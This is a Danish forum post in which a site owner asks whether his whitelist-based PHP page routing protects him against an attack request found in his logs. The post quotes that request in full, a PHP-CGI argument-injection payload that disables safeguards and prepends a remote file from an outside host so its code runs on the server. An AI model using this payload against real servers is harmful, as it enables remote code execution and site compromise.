Jeg er ved at lege med lidt statistik på Fidusos sider, og i den
forbindelse aflæste jeg bl.a. $_SERVER['REQUEST_URI']. Jeg skrev
de fundne data til en tekstfil som jeg så vil bearbejde med et
statistikprogram.
I datafilen forekom så følgende request:
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://
tenderplus.spb.ru//components/com_foxcontact/default.txt
Hvis du ikke gider læse den hele, kan jeg afsløre at dette domæne
optræderderi:
tenderplus.spb.ru
Nu er Fidusos indgangsside lavet således:
$code='index';
$order=$_GET['page'];
if (isset($sider[$order]))
$code=$order;
Jeg er nogenlunde sikker på at det garanterer at den slags angreb
ikke kan få succes, men jeg vil gerne lige jhave det bekræftet.
Er det ikke korrekt?
$sider er en variabel der hentes fra en inc-fil hvis start ses
her :
$sider = Array (
'index' => 'Forside',
'skraekeksempler' => 'Skrækeksempler',
'splittet' => 'Splittede ord',
osv.
Er det ikke korrekt at det er GET-konstruktionen der har fået dem
til at forsøge et angreb?
--
/Bertel